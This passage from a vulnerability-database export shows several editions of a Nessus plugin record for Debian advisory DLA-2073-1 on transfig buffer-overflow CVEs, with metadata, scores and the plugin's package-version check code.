"edition": 3}, {"bulletin": {"id": "DEBIAN_DLA-2073.NASL", "hash": "5360d57637a8d5f35262d09f253a6b8692b80f4bf0271ba151f90366b0ce8703", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 ", "published": "2020-01-22T00:00:00", "modified": "2020-08-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/transfig", "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html"], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2020-08-01T01:15:40", "history": [], "viewCount": 19, "enchantments": {"dependencies": {"modified": "2020-08-01T01:15:40", "references": [{"idList": ["USN-3760-1"], "type": "ubuntu"}, {"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"], "type": "openvas"}, {"idList": ["OPENSUSE-SU-2019:1455-1"], "type": "suse"}, {"idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2019-1455.NASL", "SUSE_SU-2020-1806-1.NASL"], "type": "nessus"}, {"idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-08-01T01:15:40", "rev": 2, "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/24\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-08-01T01:15:40", "differentElements": ["description", "modified", "reporter", "sourceData"], "edition": 4}, {"bulletin": {"id": "DEBIAN_DLA-2073.NASL", "hash": "6e9734b34a7a81aacd2f69f2ffbb45c14079274cfbe277b82a1a080c67f6200f", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "published": "2020-01-22T00:00:00", "modified": "2020-01-22T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/transfig", "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html"], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2021-01-12T09:42:03", "history": [], "viewCount": 19, "enchantments": {"dependencies": {"modified": "2021-01-12T09:42:03", "references": [{"idList": ["USN-3760-1"], "type": "ubuntu"}, {"idList": ["UB:CVE-2019-19555", "UB:CVE-2019-14275", "UB:CVE-2018-16140"], "type": "ubuntucve"}, {"idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"], "type": "metasploit"}, {"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"], "type": "openvas"}, {"idList": ["RH:CVE-2018-16140", "RH:CVE-2019-19555", "RH:CVE-2019-14275"], "type": "redhatcve"}, {"idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2020-1702.NASL", "OPENSUSE-2019-1455.NASL", "SUSE_SU-2020-1806-1.NASL"], "type": "nessus"}, {"idList": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-01-12T09:42:03", "rev": 2, "value": 6.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-01-12T09:42:03", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "DEBIAN_DLA-2073.NASL", "hash": "86cceb160e4abee0761024803d0c398f", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "published": "2020-01-22T00:00:00", "modified": "2020-01-22T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/transfig", "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html"], "cvelist": ["CVE-2019-19555", "CVE-2018-16140", "CVE-2019-14275"], "immutableFields": [], "lastseen": "2021-07-28T22:57:58", "history": [], "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-16140", "CVE-2019-19555", "CVE-2019-14275"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-16140", "UB:CVE-2019-19555", "UB:CVE-2019-14275"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2018-16140", "RH:CVE-2019-14275"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310843744", "OPENVAS:1361412562310852517"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"]}, {"type": "nessus", "idList": ["UBUNTU_USN-3760-1.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-2454-1.NASL", "SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2020-1702.NASL", "OPENSUSE-2019-1455.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2021:2454-1"]}, {"type": "ubuntu", "idList": ["USN-3760-1"]}], "modified": "2021-07-28T22:57:58", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-07-28T22:57:58", "rev": 2}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-28T22:57:58", "differentElements": ["cpe", "cvss2", "cvss3", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "DEBIAN_DLA-2073.NASL", "hash": "bf52b25c522a279a30618d616d3572f0", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2073-1 : transfig security update", "description": "Several issues have been found in transfig, a XFig figure files converter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to write prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2020-01-22T00:00:00", "modified": "2021-01-11T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/133150", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "https://packages.debian.org/source/jessie/transfig", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16140"], "cvelist": ["CVE-2018-16140", "CVE-2019-14275", "CVE-2019-19555"], "immutableFields": [], "lastseen": "2021-08-05T13:10:19", "history": [], "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2018-16140", "RH:CVE-2019-14275", "RH:CVE-2019-19555"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-14275", "UB:CVE-2018-16140", "UB:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-14275", "CVE-2018-16140", "CVE-2019-19555"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843744", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310852517"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2018-16140/"]}, {"type": "nessus", "idList": ["OPENSUSE-2019-1455.NASL", "SUSE_SU-2020-1806-1.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2020-1702.NASL", "OPENSUSE-2020-1843.NASL", "UBUNTU_USN-3760-1.NASL", "OPENSUSE-2021-2454.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1"]}, {"type": "ubuntu", "idList": ["USN-3760-1"]}], "modified": "2021-08-05T13:10:19", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-05T13:10:19", "rev": 2}}, "objectVersion": "1.6", "pluginID": "133150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2073-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133150);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-16140\", \"CVE-2019-14275\", \"CVE-2019-19555\");\n\n script_name(english:\"Debian DLA-2073-1 : transfig security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been found in transfig, a XFig figure files\nconverter.\n\nCVE-2018-16140\n\nBuffer underwrite vulnerability in get_line() allows an attacker to\nwrite prior to the beginning of the buffer via a crafted .fig file.\n\nCVE-2019-14275\n\nStack-based buffer overflow in the calc_arrow function in bound.c.\n\nCVE-2019-19555\n\nStack-based buffer overflow because of an incorrect sscanf.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:3.2.5.e-4+deb8u2.\n\nWe recommend that you upgrade your transfig packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/transfig\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected transfig package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"transfig\", reference:\"1:3.2.5.e-4+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": [], "solution": "Upgrade the affected transfig package.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-01-21T00:00:00", "vulnerabilityPublicationDate": "2018-08-30T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T13:10:19", "differentElements": ["cpe"], "edition": 